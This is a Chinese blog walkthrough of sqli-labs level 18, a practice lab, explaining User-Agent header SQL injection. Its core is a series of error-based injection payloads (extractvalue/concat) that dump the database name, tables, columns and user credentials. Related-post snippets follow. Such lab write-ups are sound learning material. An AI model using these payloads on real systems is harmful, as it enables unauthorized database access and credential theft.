sqli-labs第十八关——POST-UA注入

已于 2025-05-21 19:44:21 修改
阅读量726 收藏 2
点赞数 24
文章标签: 前端 数据库 sqlilabs sql注入 网络安全 UA注入 报错注入
于 2025-05-21 19:11:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2403_88102829/article/details/148122009
版权

一:判断注入类型

先在用户名和密码框尝试判断,发现都得不到需要的回显

所以查看源码

可以发现username和password的输入后端都做了检查,没法直接注入

所以我们尝试uagent注入

UA注入:

  • 没有url解码处理
  • 只识别原始空格,+,%20都不作为空格解析
  • 在User-agent字段中注入

先用一组密码登录,bp抓包 

构造判断的payload 

User-Agent: 1
User-Agent: 1'
User-Agent: 1"
User-Agent: 1')
User-Agent: 1")

单引号的时候产生不同的回显 

其余均为

确定为单引号字符型,尝试闭合

闭合成功但报错,其他几种情况闭合均无回显,所以我们尝试报错注入

二:开始注入

 1.爆数据库名

User-Agent: 1' and extractvalue(1,concat(0x7e,(database())))='1

2.爆表名

User-Agent: 1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))='1

3.爆列名 

User-Agent: 1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))='1

 4.爆数据

看数据量

User-Agent: 1' and extractvalue(1,concat(0x7e,(select count(*) from users)))='

分两次爆数据

extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))
extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))

 ❀❀❀ 完结撒花!!!❀❀❀

Le_ee
关注
SQL注入sqli-labs手注+sqlmap
m0_63563528的博客
07-19 2587
第一周:SQL注入学习
sql注入(六)sqli-labs手工注入
shirlly_的博客
04-12 1026
sqli-labs靶场解析
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 19万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs第十九——POST-referer注入
2403_88102829的博客
05-21 142
同理前一,bp抓包这里尝试referer注入判断流程和前一一样单引号,尝试报错注入
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
Jay17的博客
08-03 4万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs(18)
2302_78903258的博客
05-25 397
这里最重要的是第5点,简单来说我们可以在user-agent里进行注入,但注入的参数要符合sql 语句的要求,所以我们在user-name里注入的参数有3个,并且要对uagent参数进行闭合。: 这是一个SQL查询语句,目的是从名为'users'的表格中选择用户名和密码与用户输入匹配的行。首先,随便输入账号密码,然后进行抓包,当页面显示uagent的时候,我们可以想到uagent注入。: 这是一个SQL插入语句,将用户代理、IP地址和用户名插入到名为'uagents'的表格中。
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 2134
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
sqli-labs靶场通攻略(16-20
Nai_zui_jiang的博客
08-21 1656
")")
基于Sqli-Labs靶场的SQL注入-17~22
Joker
01-03 1849
这一篇博客我主要讲了HTTP头部注入中的 UA、Referer、Cookie 注入以及 base-64编码。
sqli-labs 11-20指南(详细解读)
weixin_44576725的博客
11-08 2483
前言:这里的卡多为post注入,故结合burpsuite进行抓包分析 Less-11 1、post注入,先在username输入admin’,password随便输,返回错误信息,从错误信息可知在username处应该有注入点,且可能为字符注入类型: 抓包: 2、加上万能语句or 1=1#,修改为admin’ or 1=1#,发现登陆成功,而且用户默认为dumb,可确定为字符型注入: 3、order by确定列数,确定为2: 4、开始爆破数据库、表名、列名: 数据库名: 表名: 列名
BUUCTF/sqli-labs 1-23
weixin_44041994的博客
03-21 1803
因为#号后面都被注释了。这输入正确用户名密码后,页面显示的不再是User-Agent,而是变成了Refer,我们通过抓包更改Refer,发现和18差不多,只不过18有3个参数,而19只有两个参数。上面提示让我们使用outfile,outfile是sql的语法,可以通过into outfile命令,将查询到的结果写入目标路径,在知道目标系统的绝对路径时可以使用,如。这通过测试,发现无论sql语句正确与否,返回的信息都是一样的,这样就不符合布尔注入的前提了,布尔盲注只适用于正确与错误结果不同的情况。
CTFshow-sqli-labs
Leo8283的博客
04-20 845
CTFshow sql-labs刷题记录 1-4 分别用’、"、’)、")闭合,通过联合查询语句union获取flag。由于当前调用的库非存放flag的库,可以用手注,通过元数据库information_schema.schemata表(查找所有库名),information_schema.tables表(查找所有表名),information_schema.columns表查找列名,获取flag最终的位置。 查询所有数据库 union select 1,group_concat(schema_name),
sqli-labs-php7环境搭建及通记录
weixin_44644249的博客
10-28 1962
sqli-labs-php7环境搭建及通记录 sqli-labs-php7环境搭建及通记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
[Harmony]WebView基本用法
Gamin
05-22 164
在module.json5中申请网络权限,通过requestPermissions字段指定ohos.permission.INTERNET权限,并设置使用场景为始终可用。在跳转至WebView时,通过router.pushUrl传递网页地址和标题参数。WebView组件通过aboutToAppear生命周期接收路由参数,并加载指定网页。页面包含导航栏,支持返回操作,并显示网页加载状态。整体流程实现了网络权限申请、参数传递及WebView页面展示。
基于Browser Use + Playwright 实现AI Agent操作Web UI自动化
fantasy_4的博客
05-21 709
基于Browser Use + Playwright 实现AI Agent操作Web UI自动化
【sylar-webserver】10 HTTP模块
最新发布
weixin_52355727的博客
05-22 737
HTTP 模块
自制AirTag定位器成品使用FAQ
小桥流水丿小溪
05-22 711
在安装过程中,会创建一个 Docker 卷 ( mh_data ),它位于默认文件夹中。查看Source键。该文件夹通常受到保护,只有 root 用户才能访问和修改。在该文件夹中,您将找到配置 (config.ini) 和身份验证 (auth.json)(如果已执行)。此外,用于 SSL 的自签名证书也位于此处。
使用Tkinter写一个发送kafka消息的工具
Naylor的博客
05-21 480
公司专注于AR实景产品,随着无人机的普及,提出了将无人机接入AR实景项目的需求。为此,开发了一款工具,用于模拟无人机飞行时的飞控数据。该工具基于Python 3.9.7,使用TKinter作为GUI框架,并集成confluent_kafka库进行Kafka消息处理。工具界面允许用户填写Kafka连接地址,编写并发送消息到指定topic,同时所有操作日志实时显示在用户界面。代码结构包括创建GUI程序、搭建前端样式和编写功能实现代码,其中通过回调函数处理消息发送等操作,确保用户操作的流畅性和实时反馈。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值